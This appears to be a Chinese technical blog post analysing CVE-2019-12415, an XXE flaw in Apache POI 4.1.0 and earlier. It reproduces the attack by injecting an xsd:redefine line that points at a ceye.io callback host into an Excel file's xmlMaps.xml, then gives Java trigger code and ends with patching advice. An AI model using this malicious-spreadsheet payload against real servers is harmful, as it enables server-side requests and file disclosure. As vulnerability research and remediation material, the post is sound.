[20][03][06] Apache POI 安全漏洞(CVE-2019-12415)

最新推荐文章于 2024-04-10 14:41:56 发布
最新推荐文章于 2024-04-10 14:41:56 发布
阅读量6.7k 收藏 6
点赞数 3
分类专栏: 信息安全 文章标签: apache poi Fortify XXE CVE-2019-12415
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57672329/article/details/122068602
版权

文章目录

1. 描述

Apache POI 是 Apache 的一个开源函数库,它提供 API 给 Java 程序可对 Excel 进行读和写操作的组件

poi 组件存在以下 CVE

xx

2. 场景

此次要分析的是 CVE-2019-12415

Apache POI 版本<= 4.1.0 中,当使用 XSSFExportToXml 工具转换用户提供的 Excel 文档时,可以在 xmlMaps.xml 加入恶意代码制作成 excel 文档, 代码解析文档时可以允许攻击者通过 XML External Entity(XXE) 处理在服务器读取文件资源或发送外部请求

漏洞是在使用 XSSFExportToXml 类 xlsx 转 xml 时触发的

对比版本 4.1.0 和 4.1.1 XSSFExportToXml 类的源码,发现在 isValid 方法里多设置了一个 feature,问题就出在org.apache.poi.xssf.extractor.XSSFExportToXml#isValid 方法里,如果org.apache.poi.xssf.extractor.XSSFExportToXml#exportToXML(java.io.OutputStream, java.lang.String, boolean) 方法的第三个参数为 true 则会进入 isValid 触发 XXE

xx

3. 漏洞复现

3.1 引入 apache poi 组件 4.1.0 版本

<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>4.1.0</version>

3.2 下载测试用例 excel

下载 CustomXMLMappings.xlsx 测试文件
CSDN 下载地址

github 下载地址

3.3 制作恶意 excel

把文件 CustomXMLMappings.xlsx 改为 CustomXMLMappings.zip 并解压文件,解压后的文件树

xx

编辑 CustomXMLMappings/xl/xmlMaps.xml 文件, 在xsd:schema 标签里面加上一行代码

<xsd:redefine schemaLocation="http://poi-xml.xxxxx.ceye.io"></xsd:redefine>

可以将上面的poi-xml.xxxxx.ceye.io 替换成 dnslog/ceye 等平台, 也可以使用本地自定义接口127.0.0.1:8080/xxx

xx

再把 CustomXMLMappings.xlsx 解压出来的所有文件再用 zip 打成压缩文件 zip 格式 CustomXMLMappings.zip,将 CustomXMLMappings.zip 改成 CustomXMLMappings.xlsx

3.4 测试代码

public class PoiCveTest {

    public static void main(String[] args) {
        try {
            XSSFWorkbook wb = new XSSFWorkbook(new FileInputStream(new File("CustomXMLMappings.xlsx")));
            for (XSSFMap map : wb.getCustomXMLMappings()) {
                XSSFExportToXml exporter = new XSSFExportToXml(map);
                // 使用 XSSFExportToXml 将 xlsx 转成 xml
                // 第一个参数是输出流无所谓,第二个参数要为 true
                exporter.exportToXML(System.out, true);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

查看 ceye 平台发现请求记录

xx

4. 修复方案

  • 升级 poi 版本>= 4.1.1
  • 不要使用 XSSFExportToXml 类,或者不要让 exportToXML 方法的第二个参数为 true
安全新司机
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Poi HSSFCellStyle.ALIGN_CENTER VERTICAL_CENTER 等爆红的解决办法
Tongyao
05-31 3316
Apache POI是画excel工具,大家在接收旧代码时会出现以下问题: HSSFCellStyle.ALIGN_CENTER HSSFCellStyle.VERTICAL_CENTER 等爆红 原因是版本出错: <dependency> <groupId>org.apache.poi</groupId> <artifactId>poi-ooxml</artifactId> <version>4.1.2<
poi的各个版本
12-20
poi3.8、poi3.9、poi3.10、poi4.0.1的jar包资源poi3.8、poi3.9、poi3.10、poi4.0.1的jar包资源
Apache POI 安全漏洞
weixin_44778952的博客
11-12 2246
漏洞来源 http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201910-1431 漏洞详情 Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在代码问题漏洞。攻击者可借助特制的文档利用该漏洞读取本地文件系统中或网络资源中的文件。 参考资料 来源:lists.apache.org 链接:ht
[漏洞复现]Apache POI < 3(2),网络安全面试必问
最新发布
2401_84185471的博客
04-10 275
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!创建一个**[Content_Types].xml文件和xxe.dtd文件注意名字不可修改**因篇幅有限,仅展示部分资料。
解决Apache POI 代码问题漏洞时,缺少类的问题 (CTPageMar 等)
Oxye
04-17 3016
目录问题代码漏洞告警寻找高版本解决方案一:根据告警提示替换依赖更新依赖步骤解决方案二:把缺少的类从旧包拷到本地解决方案三:终于找到靠谱的依赖总结 问题 先把问题放这 代码漏洞告警 昨天项目代码被检测到POI高危漏洞 漏洞级别:高危漏洞名称:Apache POI 代码问题漏洞 漏洞介绍 Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在安全漏洞。攻击者
[漏洞复现]Apache POI < 3.10.1 XXECVE-2014-3529)
k5664524的博客
01-16 1484
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。
poi-3.9 apache-poi-3.9 最新稳定版本
07-02
在"poi-3.9.jar"这个文件中,包含了Apache POI项目的主要类和接口,用于处理HSSF(Horizontally Stored Formatted Sheets)和XSSF(XML Spreadsheet Format)文件,分别对应老版的.BIFF8 Excel格式和OOXML的新版....
poi-ooxml-5.2.2.jar中文文档.zip
03-01
poi-ooxml-***.jar中文文档.zip,java,poi-ooxml-***.jar,org.apache.poi,poi-ooxml,***,org.apache.poi.ooxml,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,apache,poi,ooxml,中文API文档,手册,开发...
poi-ooxml-4.1.2.jar中文文档.zip
03-01
poi-ooxml-***.jar中文文档.zip,java,poi-ooxml-***.jar,org.apache.poi,poi-ooxml,***,org.apache.poi.ooxml,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,apache,poi,ooxml,中文API文档,手册,开发...
poi-scratchpad-4.1.2-API文档-中文版.zip
07-14
赠送jar包:poi-scratchpad-4.1.2.jar; 赠送原API文档:poi-scratchpad-4.1.2-javadoc.jar; 赠送源代码:poi-scratchpad-4.1.2-sources.jar; 赠送Maven依赖信息文件:poi-scratchpad-4.1.2.pom; 包含翻译后的API...
poi-ooxml-5.2.3.jar中文文档.zip
03-01
poi-ooxml-***.jar中文文档.zip,java,poi-ooxml-***.jar,org.apache.poi,poi-ooxml,***,org.apache.poi.ooxml,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,apache,poi,ooxml,中文API文档,手册,开发...
Android APP使用的三方组件存在漏洞整改后报错:ava.lang.NoClassDefFoundError: Failed resolution of: Ljava/awt/Color;
zjh8811的专栏
11-08 510
Android APP使用的三方组件存在漏洞整改后报错:ava.lang.NoClassDefFoundError: Failed resolution of: Ljava/awt/Color;
解决poi漏洞升级后的代码编译错误
12-06 4743
描述:项目中的 poi 包有点旧,很多方法都没有,现在导入新的 poi 包,导致原先项目中的 代码报错。 描述:下面是遇到的一些报错,解决方案。代码如下: 解决办法:将 替换 注释中的代码即可代码如下: 解决办法:将 HorizontalAlignment.CENTER 替换 旧的即可 所在包:import org.apache.poi.ss.usermodel.HorizontalAlignment;代码如下: 解决办法:将 替换 旧的即可 所在包:代码如下: 解决办法:将 替换 旧
7z apache解析漏洞_XXE 漏洞代码及修复代码整理
weixin_27034523的博客
12-23 791
XML原理XXEXML External Entity 即XML外部实体注入攻击。是由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体,通过外部实体SYSTEM请求本地文件uri,通过某种方式返回本地的文件内容,导致了XXE漏洞。java中出现的场景poc.xml<?xml version="1.0" encoding="ISO-8859-1" ?> &lt...
[JAVA]POI各Jar包的作用
热门推荐
王德封-逐浪
09-04 7万+
目前POI的最新发布版本是3.10_FINAL.该版本保护的jar包有: Maven artifactId Prerequisites JAR poi commons-logging, commons-codec, log4j poi-version-yyyymmdd.jar poi-scratchpad poi
POI版本升级,从POI3.11升级到POI4.1.0
秋装什么的博客
02-17 1688
POI版本升级,从POI3.11升级到POI4.1.0
CVE-2019-0708 补丁下载地址与漏洞修复办法
网站安全专家
05-17 4万+
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。 目前国内使用windows服务器的公司,以及网站...
修复CVE-2019-3862漏洞
发现美的眼睛
05-11 2610
修复CVE-2019-3862漏洞 这个漏洞来自于libssh2中的,发现者是国外团队,在发现之初就已经提交上去。在公布漏洞时,该漏洞已经被修复,修复方式采用更新。 修复时,博客主查看了一下阿里云安全中心的修复方案和网上其它博客主的修复方案,都是使用yum对curl的更新。 # 如果yum update要使用的话,请注意linux内核也有可能会被更新 yum update # 更新curl命令,这篇博客文章发布时,修复漏洞的新版本是7.29.0 yum update curl # 查看一下当前
无法解析 org.apache.poi:poi-ooxml-schemas:3.9
09-27
无法解析 org.apache.poi:poi-ooxml-schemas:3.9通常是由于Maven无法找到该依赖项引起的。您可以尝试以下解决方法: 1. 确保您的项目的pom.xml文件中包含了正确的Maven仓库地址,并且仓库中包含了所需的依赖。 2. 检查您的网络连接是否正常,以确保Maven能够正常访问远程仓库。 3. 尝试清除Maven本地仓库中的缓存,然后重新构建项目。可以通过删除Maven本地仓库目录(默认路径为~/.m2/repository)中的相关文件来实现。 4. 如果您使用的是私有仓库,确保您的身份验证信息正确,并且您有访问该仓库的权限。 如果上述方法都无法解决问题,您可以尝试搜索相关错误信息或者向Maven社区寻求帮助。希望这些方法能够帮助您解决问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值